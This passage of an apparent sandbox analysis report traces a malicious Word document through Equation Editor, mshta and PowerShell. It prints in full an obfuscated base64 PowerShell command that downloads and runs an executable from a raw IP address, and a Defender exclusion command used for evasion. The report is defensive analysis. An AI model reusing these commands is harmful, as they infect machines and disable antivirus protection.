                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&......................i.o.n.a.................l.......(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&......................i.o.n.a.........................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................'......................i.o.n.a.........................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................'......................i.o.n.a.........................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................Q.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................Q.........................s..............#.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............!Q.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............-Q.........................s..............#.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............?Q.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............KQ.........................s..............#.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......d.......l...............]Q.........................s..............#.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............iQ.........................s..............#.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........{Q.........................s..............#..... .......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................Q.........................s..............#.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................Q.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................Q.........................s..............#.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......Q.........................s..............#.....$.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................Q.........................s..............#.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................Q.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................Q.........................s..............#.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............#.....2.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................R.........................s..............#.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................R.........................s....................l.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............)R.........................s..............#.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....d.......l...............<R.........................s..............#.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............HR.........................s..............#.............................Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: stthigns.docReversingLabs: Detection: 50%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4441.tmp" "c:\Users\user\AppData\Local\Temp\4vzopkvk\CSC2CE1E80E8DFB46C4BC398124C902BE0.TMP"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNtJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4441.tmp" "c:\Users\user\AppData\Local\Temp\4vzopkvk\CSC2CE1E80E8DFB46C4BC398124C902BE0.TMP"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wow64win.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: mozglue.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: dbghelp.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: msvcp140.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: vcruntime140.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: ucrtbase.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wsock32.dll
